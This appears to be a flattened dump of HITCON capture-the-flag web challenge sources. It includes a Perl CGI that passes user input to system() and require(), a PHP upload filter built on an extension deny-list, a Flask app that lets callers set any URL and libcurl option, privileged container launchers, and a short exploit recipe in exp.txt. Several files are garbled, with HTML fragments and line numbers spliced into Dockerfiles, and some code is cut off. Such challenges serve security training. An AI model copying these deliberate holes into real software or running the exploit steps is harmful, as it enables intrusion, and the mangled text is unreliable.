"math.randomseed(ARGV[1]) for i=0, ARGV[2] do math.random() end return math.random(2^31-1)"; 46 | $seed = random_int(0, 0xffffffff / 2); 47 | $count = random_int(5, 10); 48 | $result = $redis->eval($LUA_LOTTERY, array($seed, $count)); 49 | 50 | sleep(3); // Slow down... 
51 | if ((int)$result === $guess) 52 | die("Congratulations, the flag is $FLAG"); 53 | die(":("); 54 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/virtual-public-network/diag.cgi: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use lib '/var/www/html/'; 3 | use strict; 4 | 5 | use CGI (); 6 | use DSSafe; 7 | 8 | 9 | sub tcpdump_options_syntax_check { 10 | my $options = shift; 11 | return $options if system("timeout -s 9 2 /usr/bin/tcpdump -d $options >/dev/null 2>&1") == 0; 12 | return undef; 13 | } 14 | 15 | print "Content-type: text/html\n\n"; 16 | 17 | my $options = CGI::param("options"); 18 | my $output = tcpdump_options_syntax_check($options); 19 | 20 | 21 | # backdoor :) -- intentional for the challenge: the "tpl" parameter is only rejected when it contains "..", then "./tmp/<tpl>.thtml" is passed to require(), i.e. executed as Perl. 22 | my $tpl = CGI::param("tpl"); 23 | if (length $tpl > 0 && index($tpl, "..") == -1) { 24 | $tpl = "./tmp/" . $tpl . ".thtml"; 25 | require($tpl); 26 | } -------------------------------------------------------------------------------- /hitcon-ctf-2020/Return-of-Use-After-Flee/index.php: -------------------------------------------------------------------------------- 1 | $fid, 'beforeFid'=>$ext['currentFid'])); 36 | -------------------------------------------------------------------------------- /hitcon-ctf-2020/Return-of-Use-After-Flee/install.txt: -------------------------------------------------------------------------------- 1 | # CentOS 5.7 2 | # Apache 2.2.22 3 | ./configure --prefix=/usr/local/apache2 --sysconfdir=/etc/httpd --enable-rewrite=static --with-mpm=worker --enable-so --enable-proxy --enable-proxy-http --enable-deflate --enable-headers --enable-expires --with-included-apr 4 | 5 | # PHP 5.3.27 6 | ./configure --prefix=/usr/local/apache2/php --with-apxs2=/usr/local/apache2/bin/apxs --with-config-file-path=/usr/local/apache2/php --enable-mysqlnd -------------------------------------------------------------------------------- 
/hitcon-ctf-2020/Return-of-Use-After-Flee/libphp5.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2020/Return-of-Use-After-Flee/libphp5.so -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell-wrapper.py: --------------------------------------------------------------------------------
#!/usr/bin/python -u
# Python 2 (raw_input, str.encode('hex')). Front door for the oShell challenge:
# validates a team token against the scoreboard, then starts (or re-attaches
# to) that team's docker container and hands the caller an interactive tty in
# it. docker is run through sudo, so the account executing this wrapper needs a
# sudoers entry for it.
import os, sys
import pty
import uuid
import requests
from time import sleep
from tempfile import mkstemp
from subprocess import check_output

# ANSI escape prefixes used by _color().
COLORS = {
    'header': '\033[95m',
    'blue': '\033[94m',
    'cyan': '\033[96m',
    'green': '\033[92m',
    'warning': '\033[93m',
    'fail': '\033[91m',
    'endc': '\033[0m',
    'bold': '\033[1m',
    'underline': '\033[4m',
    'blink': '\033[5m',
}

def check_token(token):
    """Return the scoreboard's team id for a valid token, else a falsy value.

    Only strings that uuid.UUID() accepts are forwarded. uuid.UUID() is more
    permissive than the canonical 8-4-4-4-12 form (it also takes braces, a
    'urn:uuid:' prefix and hyphen-less hex), and the RAW token string -- not
    the normalised UUID -- is what goes into the URL here and into the
    container name in main. The HTTP status of the scoreboard reply is not
    checked; a non-JSON body raises out of r.json().
    """
    def _is_valid_uuid(s):
        try:
            return uuid.UUID(s) is not None
        except:
            return False

    if _is_valid_uuid(token):
        r = requests.get('https://ctf2020.hitcon.org/team/token_auth?token=%s' % token)
        return r.json().get('id')
    # else:
    #     if token == 'orange':
    #         return True

def my_exec(cmds):
    """Run cmds as an argv list (no shell) and return its stdout.

    Raises CalledProcessError on a non-zero exit; callers do not catch it.
    """
    return check_output(cmds)

def _color(s, color=''):
    """Wrap s in bold plus the named COLORS entry; an unknown or empty color
    returns s unchanged."""
    code = COLORS.get(color)
    if code:
        return COLORS['bold'] + code + s + COLORS['endc'] + COLORS['endc']
    else:
        return s

if __name__ == '__main__':
    token = raw_input(_color('Team token: ', 'bold')).strip()
    if not token or not check_token(token):
        print(_color('Bad token. Bye!\n', 'warning'))
        exit(-1)

    # Container name is built from the raw token (see check_token); a token in
    # one of the non-canonical UUID spellings would make `docker run --name`
    # fail and surface as an uncaught CalledProcessError.
    name = 'team-%s' % token
    cmds = [
        'sudo',
        'docker', 'ps', '-q',
        '-f', 'name=%s' % name
    ]
    container_id = my_exec(cmds)
    if container_id:
        print(_color('[*] Connecting to initialized instance...\n', 'bold'))
    else:
        print(_color('[*] Initializing instance...\n', 'bold'))

        # Per-instance "enable" secret: 8 random bytes, hex-encoded, written to
        # a host tempfile and bind-mounted into the container as /enable.secret.
        # NOTE(review): the fd returned by mkstemp is discarded and never
        # closed (one leaked fd per launch); `fd, tmp_name = mkstemp(...)` with
        # os.fdopen(fd, 'wb') in place of the re-open below would fix it.
        _, tmp_name = mkstemp(prefix='%s_'%name, dir='/home/orange/tmp/')
        with open(tmp_name, 'wb+') as fp:
            fp.write('this-is-secret-' + os.urandom(8).encode('hex'))

        # 0444 = world-readable on the host, and therefore readable by any uid
        # inside the container once mounted -- confirm this is intended.
        os.chmod(tmp_name, 0o444)
        cmds = [
            'sudo',
            'docker', 'rm', '-f', name
        ]
        # Best-effort removal of a stale container with this name; failure
        # (normally "no such container") is deliberately ignored.
        try:
            with open(os.devnull, 'w') as devnull:
                check_output(cmds, stderr=devnull)
        except:
            pass

        cmds = [
            'sudo',
            'docker', 'run', '-d', '--rm',
            '--env', 'LOG_HOST=172.17.0.1',
            '-v', '%s:/enable.secret' % tmp_name,
            '--name', name,
            'oshell'
        ]
        my_exec(cmds)
        # Fixed delay for the container to come up; there is no readiness check.
        sleep(2)

    # Attach as the unprivileged oShell user; the restricted shell itself is
    # /oShell.py inside the image.
    cmds = [
        'sudo',
        'docker', 'exec', '-ti',
        '-u', 'oShell',
        name,
        'python', '/oShell.py', 'tty'
    ]

    pty.spawn(cmds)
-------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/Dockerfile: --------------------------------------------------------------------------------
FROM alpine:3.7
MAINTAINER Orange Tsai
49 |
50 |51 |53 | 54 |Query Names...
52 |
55 |
56 |57 |71 | 72 |58 | 69 |70 |
73 |
74 |75 | 76 |77 |3 | 4 | # add user 5 | RUN adduser oShell -h / -s /bin/nologin -D -u 1337 -h /home/oShell/ 6 | 7 | # copy file 8 | ADD oShell.py / 9 | ADD readflag / 10 | ADD flag / 11 | ADD tcpdump /bin/ 12 | 13 | 14 | # cmd 15 | RUN apk update 16 | RUN apk add htop strace procps libcap python2 17 | 18 | # permission 19 | RUN chmod 400 /flag 20 | RUN chmod +s /readflag 21 | RUN chmod 774 /oShell.py 22 | 23 | # setup 24 | RUN setcap cap_net_raw=eip /bin/tcpdump cap_net_raw=eip /bin/busybox 25 | RUN rm -rf /usr/bin/top && sed -i 's/UNKNOWN/3.3.12 /g' /bin/top 26 | 27 | CMD ["sleep", "300"] -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | docker rm -f `docker ps -a -q` 4 | docker rmi -f oshell 5 | 6 | docker build . -t oshell 7 | # docker run -ti --name team-$1 -u oShell oshell -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/exp.txt: -------------------------------------------------------------------------------- 1 | enable 2 | ping 3 | tcpdump -w /home/oShell/.toprc icmp 4 | 5 | ping -c 1 13.115.220.111 6 | 7 | # https://github.com/PixelsCamp/ping-responder 8 | # echo net.ipv4.icmp_echo_ignore_all=1 | sudo tee /etc/sysctl.d/z01-disable_echo_reply.conf >/dev/null 9 | # systemctl restart systemd-sysctl 10 | echo -ne '\n\npipe\tOpen Files\ttouch /tmp/eeeeeeeeeeee\n\n' > payload 11 | python3 oshell-icmp.py -v -z -f payload 12 | -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/flag: -------------------------------------------------------------------------------- 1 | HITCON{A! AAAAAAAAAAAA! 
SHAR~K!!!} 2 | -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2020/oShell/oShell/readflag -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // gcc -m32 -static -o readflag ./readflag.c 4 | int main(){ 5 | char s[1024] = {0}; 6 | FILE *fp = fopen("/flag", "rb"); 7 | fread(&s, 1, 1024, fp); 8 | printf("%s", s); 9 | } -------------------------------------------------------------------------------- /hitcon-ctf-2020/oShell/oShell/tcpdump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2020/oShell/oShell/tcpdump -------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/bot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # coding: utf-8 3 | 4 | import time, sys, json, selenium 5 | from redis import Redis 6 | from selenium import webdriver 7 | from rq import Connection, Worker, Queue 8 | import logging 9 | 10 | logging.getLogger('rq.worker').addHandler(logging.FileHandler("rq.log")) 11 | logging.getLogger('rq.worker').addHandler(logging.StreamHandler(sys.stdout)) 12 | 13 | 14 | FLAG = 'hitcon{var flag.map(arbitrary-file-upload-to-XSS-again!)}' 15 | CONFIG = json.load(open('oStyle/config.json', 'rb')) 16 | URL_BASE = CONFIG.get('URL_BASE') 17 | REDIS_PASS = CONFIG.get('REDIS_PASS') 18 | 19 | def add(url): 20 | chrome_options = webdriver.ChromeOptions() 21 | 
chrome_options.add_argument('--headless') 22 | chrome_options.add_argument('--disable-gpu') 23 | chrome_options.add_argument('--disable-dev-shm-usage') 24 | chrome_options.add_experimental_option("prefs", { 25 | 'download.prompt_for_download': True, 26 | 'download.default_directory': '/dev/null' 27 | }) 28 | # chrome_options.add_argument('--no-sandbox') 29 | 30 | client = webdriver.Chrome('./chromedriver', chrome_options=chrome_options) 31 | client.set_page_load_timeout(5) 32 | client.set_script_timeout(5) 33 | 34 | client.get(URL_BASE) 35 | client.add_cookie({ 36 | 'name': 'this-is-for-you', 37 | 'value': FLAG, 38 | }) 39 | 40 | with open('save_url.log', 'a+') as fp: 41 | print(url) 42 | fp.write(url + '\n') 43 | client.get(url) 44 | i = 0 45 | while 1: 46 | try: 47 | client.switch_to_alert().accept() 48 | i += 1 49 | if i > 1000: 50 | break 51 | except selenium.common.exceptions.NoAlertPresentException: 52 | break 53 | 54 | time.sleep(2) 55 | client.quit() 56 | 57 | if __name__ == '__main__': 58 | if 'test' in sys.argv: 59 | add(sys.argv[2]) 60 | exit() 61 | 62 | with Connection(connection=Redis(host="127.0.0.1", password=REDIS_PASS)): 63 | w = Worker('default', log_job_description=True, serializer=json) 64 | w.work() 65 | -------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/oStyle/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | EXPOSE 80 3 | ENV DEBIAN_FRONTEND=noninteractive 4 | 5 | RUN apt-get update && \ 6 | apt-get install -y apache2 libapache2-mod-php7.4 python3 python3-pip 7 | RUN pip3 install rq 8 | RUN a2enmod headers 9 | RUN mkdir /var/www/html/upload && chmod 777 /var/www/html/upload/ 10 | RUN rm /var/www/html/index.html 11 | 12 | ADD my_security.conf /etc/apache2/mods-enabled/ 13 | ADD config.json / 14 | ADD www/* /var/www/html/ 15 | 16 | CMD ["sh", "-c", "service apache2 start && tail -f /var/log/apache2/error.log"] 
-------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/oStyle/config.json: --------------------------------------------------------------------------------
{
    "REDIS_HOST": "172.17.0.1",
    "REDIS_PASS": "fake-redis-pass",
    "URL_BASE": "http://52.68.87.21/"
}
-------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/oStyle/my_security.conf: --------------------------------------------------------------------------------
# Security Headers

# NOTE(review): `Header set` replaces any earlier value of the same header, so
# the SAMEORIGIN line below is dead -- clients receive the later DENY. Keep
# one of the two lines.
Header set X-Frame-Options "SAMEORIGIN"
Header set X-Content-Type-Options "nosniff"
Header set X-Frame-Options "DENY"


# NOTE(review): the opening and closing container directive around the next
# three lines (presumably <Directory ...> for the upload dir the Dockerfile
# creates) was lost in extraction; as copied here they would apply
# server-wide. `php_flag engine off` is the control that stops uploaded files
# from being executed as PHP.
    Options -Indexes
    AllowOverride None
    php_flag engine off
-------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/oStyle/www/add_queue.py: --------------------------------------------------------------------------------
#!/usr/bin/python3
# Enqueues a URL for the headless-Chrome bot (bot.add) after a per-address
# rate limit. Invoked with argv[1] = client address and argv[2] = base64 URL;
# the caller is not in this listing.

import sys, json
from rq import Queue
from redis import Redis
from base64 import b64decode

# fix python-rq bug...
# Job payloads are pickled (protocol 4). NOTE(review): the worker in bot.py is
# constructed with serializer=json; verify against the rq version in use that
# jobs enqueued with this serializer are decoded by that worker.
import pickle
from functools import partial
class Hook:
    dumps = partial(pickle.dumps, protocol=4)
    loads = pickle.loads


CONFIG = json.load(open('/config.json', 'r'))
URL_BASE = CONFIG.get('URL_BASE')
REDIS_HOST = CONFIG.get('REDIS_HOST')
REDIS_PASS = CONFIG.get('REDIS_PASS')

address = sys.argv[1]
url = b64decode(sys.argv[2]).decode()

def die(msg):
    """Print msg and exit.

    exit() raises SystemExit, which the `except Exception` in main does not
    catch, so die() called inside that try block still terminates the script.
    """
    print(msg)
    exit()

if __name__ == '__main__':
    # Prefix check only: any path under URL_BASE is accepted, i.e. the bot will
    # visit whatever is served from that host, including user uploads.
    if len(url) < 12 or not url.startswith(URL_BASE):
        die('Wrong URL ;(')

    try:
        conn = Redis(host=REDIS_HOST, password=REDIS_PASS)
        key = 'LOCKER_%s' % address

        # NOTE(review): get() followed by setex() is two round trips, so two
        # requests from the same address arriving together both pass the
        # check. An atomic
        # `if not conn.set(key, 'ok', ex=16, nx=True): die('Too fast ;(')`
        # closes the window.
        if conn.get(key):
            die('Too fast ;(')
        else:
            conn.setex(key, 16, 'ok')

        q = Queue(connection=conn, serializer=Hook)
        q.enqueue('bot.add', url)
        die('Please wait for admin ;)')

    except Exception as e:
        # repr(e) is echoed to the client; on a connection failure it may
        # include Redis host details.
        die('Something wrong [%s] ;(' % repr(e))
-------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/oStyle/www/index.php: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /hitcon-ctf-2020/oStyle/oStyle/www/upload.php: --------------------------------------------------------------------------------
// NOTE(review): only the tail of line 16 onward survived extraction; the
// <?php opener and the code that sets $ext, $tmp_name and $upload_dir are not
// in this listing. The fragment below is the end of a comparison against
// 0x1337 (presumably a size limit).
0x1337) die('🤔');
// Extension filter is a substring deny-list on the caller-supplied $ext; any
// extension not containing one of these fragments is accepted, and nothing
// inspects the file content itself.
if (strstr($ext, 'x') != False) die('🤔');
if (strstr($ext, 'ht') != False) die('🤔');
if (strstr($ext, 'ph') != False) die('🤔');
if (strstr($ext, 'ini') != False) die('🤔');
if (strstr($ext, 'htm') != False) die('🤔');
if (strstr($ext, 'xml') != False) die('🤔');
if (strstr($ext, 'svg') != False) die('🤔');
if (strstr($ext, 'app') != False) die('🤔');

// Stored name is the content hash plus the caller's extension; identical
// content with the same extension maps to the same path.
$dst = sprintf('%s/%s.%s', $upload_dir, md5_file($tmp_name), $ext);
move_uploaded_file($tmp_name, $dst);
echo 
htmlentities($dst); -------------------------------------------------------------------------------- /hitcon-ctf-2021/FBI-Warning/src/1638537259302.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/FBI-Warning/src/1638537259302.jpg -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | MAINTAINER
21 |
22 |23 |25 | 26 |Report a malicious URL to admin?
24 |
27 |
28 |29 |43 | 44 |30 | 41 |42 |
45 |
orange@chroot.org

EXPOSE 80/tcp

RUN apt update && apt install -y libcurl4-openssl-dev openssl libssl-dev python3 python3-pip nfs-common
RUN pip3 install pycurl flask certifi

COPY app/ /app
COPY files/readflag /readflag
COPY files/flag /flag
COPY files/entrypoint.sh /

WORKDIR /app/
CMD ["/entrypoint.sh"]
-------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/Makefile: --------------------------------------------------------------------------------
compile:
	gcc -o files/readflag files/readflag.c

build: compile clean
	docker build -t metamon-verse . --no-cache

# Local run mirrors run.py: the container is --privileged and nfs.server is the
# docker host gateway (the flag file notes the privilege is deliberate).
test-run:
	docker run --rm -p 12345:80 --name test --add-host=nfs.server:host-gateway --log-driver=syslog --privileged=true --env CTF_PASSWD=ctf -t -i metamon-verse

test-exec:
	docker exec -ti test /bin/bash

# Player handout: real flag and readflag.c are excluded, fake-flag is renamed
# to flag inside the archive.
pack: compile
	rm -rf static/metamon-verse.tgz
	tar --exclude='flag' --exclude='readflag.c' --transform='flags=r;s|fake-flag|flag|' -zcvf static/metamon-verse.tgz Dockerfile app/ files/

mount:
	mount -t ext4 /dev/nvme1n1 /data

clean:
	-docker rm -f `docker ps -a -q`
	-docker rmi -f `docker images -a -q`

run: pack
	python3 run.py 2>&1 | tee -a logs/log.txt

debug-run:
	python3 run.py debug
-------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/app/app.py: --------------------------------------------------------------------------------
# coding: UTF-8
# Metamon-Verse: fetches a caller-supplied URL with libcurl and stores the
# response body under static/images/ (which entrypoint.sh symlinks onto the
# NFS mount at /data). Everything sits behind HTTP Basic auth using the
# per-instance CTF_PASSWD.
import os, sys
from hashlib import md5
from functools import wraps
from flask import Flask, render_template, request

import pycurl
import certifi

PORT = 80

def login_required(f):
    """Basic-auth gate: user 'ctf', password taken from the CTF_PASSWD env var.

    NOTE(review): the password is compared with `==`; hmac.compare_digest
    would make the comparison constant-time.
    """
    @wraps(f)
    def wrapped_view(**kwargs):
        def check_auth(username, password):
            return username == 'ctf' and password == os.environ['CTF_PASSWD']
        auth = request.authorization
        if not (auth and check_auth(auth.username, auth.password)):
            return ('Unauthorized', 401, {
                'WWW-Authenticate': 'Basic realm="Login Required"'
            })

        return f(**kwargs)

    return wrapped_view

app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True

@app.route('/', methods=['GET'])
@login_required
def index():
    return render_template('index.html')

@app.route('/', methods=['POST'])
@login_required
def submit():
    """Fetch `url` with pycurl and save the response body as a .jpg.

    Trust boundary: `url` is handed to libcurl as-is -- no scheme, host or port
    restriction is applied -- so anything reachable from the container over
    any protocol the linked libcurl supports can be requested. In addition,
    the first form field named CURLOPT_<NAME> whose NAME is an attribute of the
    pycurl module and whose value parses as int is applied with setopt(), i.e.
    the caller may set one arbitrary integer-valued libcurl option. Both are
    the challenge surface.
    """
    url = request.form.get('url')
    if not url:
        return render_template('index.html', msg='empty url')

    # Only the first CURLOPT_* field is considered; an unknown name or a
    # non-integer value silently disables the option (opt_value stays None).
    opt_name, opt_value = None, None
    for key, value in request.form.items():
        if key.startswith('CURLOPT_'):
            name = key.split('_', 1)[1].upper()
            try:
                opt_name = getattr(pycurl, name)
                opt_name = int(opt_name)
                opt_value = int(value)
            except (AttributeError, ValueError, TypeError):
                break

            break

    # Destination is fixed by (peer address, url), so a repeat from the same
    # address overwrites the same file. remote_addr is the TCP peer; no
    # ProxyFix is configured, so it is not taken from X-Forwarded-For.
    name = md5(request.remote_addr.encode() + url.encode()).hexdigest()
    filename = 'static/images/%s.jpg' % name
    with open(filename, 'wb+') as fp:
        c = pycurl.Curl()
        c.setopt(c.URL, url)
        c.setopt(c.WRITEDATA, fp)
        c.setopt(c.CAINFO, certifi.where())

        # Truthiness check: option id 0 or value 0 are never applied.
        if opt_name and opt_value:
            # NOTE(review): this setopt is outside the try below; an option
            # that does not accept an int raises TypeError straight through to
            # Flask (500) with the handle left open.
            c.setopt(opt_name, opt_value)

        try:
            c.perform()
            # NOTE(review): close() only runs on success -- on pycurl.error the
            # handle is leaked. A `finally: c.close()` is the usual fix.
            c.close()
            msg = filename
        except pycurl.error as e:
            msg = str(e)

    return render_template('index.html', msg=msg)

if __name__ == '__main__':
    if 'debug' in sys.argv:
        app.debug = True
        PORT = 8000

    app.run('0.0.0.0', PORT)
-------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/app/static/bg.jpg: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Metamon-Verse/app/static/bg.jpg -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/app/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Metamon-Verse 5 | 6 | 7 | 8 | 9 | 35 | 36 | 37 |38 |76 | 77 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/files/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # perm 4 | chown nobody.nogroup -R /app/* 5 | chown root.root /*flag 6 | chmod 400 /flag 7 | chmod 111 /readflag 8 | chmod +s /readflag 9 | 10 | # service 11 | mkdir /data 12 | ln -s /data/ /app/static/images 13 | mount -t nfs nfs.server:/data /data -o nolock 14 | 15 | # run 16 | timeout -s 9 900 su -s /bin/bash nobody -c 'python3 /app/app.py' -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/files/fake-flag: -------------------------------------------------------------------------------- 1 | hitcon{this-is-fake-flag} 2 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/files/flag: -------------------------------------------------------------------------------- 1 | hitcon{OwO! >>> https://youtu.be/4pusrSxa6wI <<<} 2 | # I know privileged-container is bad but it's necessary. 
Please don't escape it :( 3 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/files/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Metamon-Verse/files/readflag -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/files/readflag.c: -------------------------------------------------------------------------------- 1 | #include
39 |
40 |41 |43 | 44 |Metamon-Verse
42 |
45 |46 |63 | 64 |47 | 61 |62 |
65 |
66 |67 | 68 | {% if msg and msg.startswith('static') %} 69 | Your Metamon 70 | {% else %} 71 | {{ msg }} 72 | {% endif %} 73 | 74 |75 |2 | 3 | // gcc -static -o readflag ./readflag.c 4 | int main(){ 5 | char s[1024] = {0}; 6 | FILE *fp = fopen("/flag", "rb"); 7 | fread(&s, 1, 1024, fp); 8 | printf("%s", s); 9 | } 10 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os, sys 4 | import uuid 5 | from random import shuffle 6 | from subprocess import run, PIPE 7 | 8 | from flask import Flask, request, make_response 9 | from redis import Redis 10 | 11 | ''' 12 | pip install redis 13 | apt install redis-server 14 | ''' 15 | 16 | PORT = 80 17 | PUBLIC_ADDRESS = '54.250.88.37' 18 | AVAILABLE_PORTS = list(range(20000, 40000)) 19 | shuffle(AVAILABLE_PORTS) 20 | 21 | INDEX = ''' 22 | Your Metamon-Verse is launched, please login with ctf / {PASS} 23 | 24 | Exec Command:
> {CMD} 25 |Exec Result:
> {RES} 26 | ''' 27 | 28 | 29 | app = Flask(__name__) 30 | conn = Redis(host='127.0.0.1', password='') 31 | 32 | def my_exec(cmds): 33 | return run(cmds, stdout=PIPE, stderr=PIPE) 34 | 35 | def response(msg): 36 | msg = "\n" + msg 37 | return msg 38 | 39 | @app.route('/') 40 | def index(): 41 | msg = '' 42 | msg += 'Download Dockerfile [Hint]
\n' 43 | msg += '
\n' 46 | msg += 'P.S. We limit the docker-lanching rate (once per minute) by your IP address.' 47 | return msg 48 | 49 | @app.route('/', methods=['POST']) 50 | def submit(): 51 | key = 'lock_%s' % request.remote_addr 52 | if conn.get(key): 53 | return response('too quick... %d second remaining' % conn.ttl(key)) 54 | else: 55 | conn.setex(key, 60, 'ok') 56 | 57 | password = uuid.uuid4().hex[:16] 58 | port = AVAILABLE_PORTS.pop() 59 | name = 'team-%s' % uuid.uuid4().hex[:16] 60 | 61 | launch_cmd = [ 62 | 'docker', 'run', '--rm', 63 | '-p', '%d:80' % port, 64 | '--name', name, 65 | '--add-host=nfs.server:host-gateway', 66 | '--log-driver=syslog', 67 | '--privileged', 68 | '--env', 'CTF_PASSWD=%s' % password, 69 | '-itd', 'metamon-verse' 70 | ] 71 | p = my_exec(launch_cmd) 72 | result = p.stdout.decode() 73 | if p.stderr: 74 | result = p.stderr.decode() 75 | 76 | msg = INDEX.strip() 77 | msg = msg.replace('{BASE}', 'http://%s:%d/' % (PUBLIC_ADDRESS, port)) 78 | msg = msg.replace('{PASS}', password) 79 | msg = msg.replace('{CMD}', ' '.join(launch_cmd)) 80 | msg = msg.replace('{RES}', result) 81 | return response(msg) 82 | 83 | if __name__ == '__main__': 84 | if 'debug' in sys.argv: 85 | app.debug = True 86 | PORT = 80 87 | 88 | print('Listening on http://%s:%d/' % (PUBLIC_ADDRESS, PORT)) 89 | app.run('0.0.0.0', PORT) 90 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/static/hint.txt: -------------------------------------------------------------------------------- 1 | As for the `nfs.server`, whatever NFS server is OK. Once your NFS server is up and the image-saving feature works fine on your local environmental, you have everything to solve the challenge! 
2 | 3 | To be more clear, here is my NFS setup: 4 | 5 | $ apt install -y nfs-kernel-server nfs-common rpcbind 6 | $ cat /etc/export 7 | /data 172.16.0.0/12(rw,sync) 8 | $ mkdir /data 9 | $ chown nobody.nogroup /data 10 | $ service nfs-kernel-server start -------------------------------------------------------------------------------- /hitcon-ctf-2021/Metamon-Verse/static/metamon-verse.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Metamon-Verse/static/metamon-verse.tgz -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wordpress:5.8.2-apache 2 | MAINTAINERorange@chroot.org 3 | 4 | EXPOSE 80/tcp 5 | 6 | RUN DEBIAN_FRONTEND=noninteractive apt update && apt install -y --no-install-recommends mariadb-server 7 | 8 | COPY files/entrypoint.sh /entrypoint.sh 9 | COPY files/init.sql /init.sql 10 | COPY files/hack.php /hack.php 11 | COPY files/htaccess /var/www/html/.htaccess 12 | COPY files/readflag /readflag 13 | COPY files/flag /flag 14 | 15 | WORKDIR /var/www/html/ 16 | CMD ["/entrypoint.sh"] -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/Makefile: -------------------------------------------------------------------------------- 1 | compile: 2 | gcc -o files/readflag files/readflag.c 3 | 4 | build: compile clean 5 | docker build -t one-bit-man . 
--no-cache 6 | 7 | test-run: 8 | docker run --rm -p 12345:80 --name test --log-driver="syslog" --env CTF_PASSWD=ctf --env "CTF_BASE=http://192.168.11.11:12345/" --env "CTF_FILENAME=/var/www/html/index.php" --env "CTF_POSITION=0" --env "CTF_BITPOS=0" -ti one-bit-man 9 | 10 | test-exec: 11 | docker exec -ti test /bin/bash 12 | 13 | pack: compile 14 | rm -rf static/one-bit-man.tgz 15 | tar --exclude='flag' --exclude='readflag.c' --transform='flags=r;s|fake-flag|flag|' -zcvf static/one-bit-man.tgz Dockerfile files/ 16 | 17 | run: pack 18 | python3 run.py 2>&1 | tee -a logs/log.txt 19 | 20 | debug-run: 21 | python3 run.py debug 22 | 23 | clean: 24 | -docker rm -f `docker ps -a -q` 25 | -docker rmi -f `docker images -a -q` -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | export WORDPRESS_DB_HOST='127.0.0.1' 4 | export WORDPRESS_DB_USER='wordpress' 5 | export WORDPRESS_DB_PASSWORD='wordpress' 6 | export WORDPRESS_DB_NAME='wordpress' 7 | 8 | echo "CTF_BASE=$CTF_BASE" 9 | echo "CTF_PASSWD=$CTF_PASSWD" 10 | echo "CTF_FILENAME=$CTF_FILENAME" 11 | echo "CTF_POSITION=$CTF_POSITION" 12 | echo "CTF_BITPOS=$CTF_BITPOS" 13 | 14 | # check 15 | if [[ -z $CTF_BASE || -z $CTF_PASSWD ]]; then 16 | echo "env CTF_BASE or CTF_PASSWD not found" 17 | exit -1 18 | fi 19 | 20 | if [[ -z $CTF_FILENAME || -z $CTF_POSITION || -z $CTF_BITPOS ]]; then 21 | echo "env PHP-Hack not found" 22 | exit -1 23 | fi 24 | 25 | # perm 26 | chown root.root /*flag 27 | chmod 400 /flag 28 | chmod 111 /readflag 29 | chmod +s /readflag 30 | 31 | # db 32 | service mariadb start 33 | mysqladmin create wordpress && mysqladmin password root 34 | sed -i 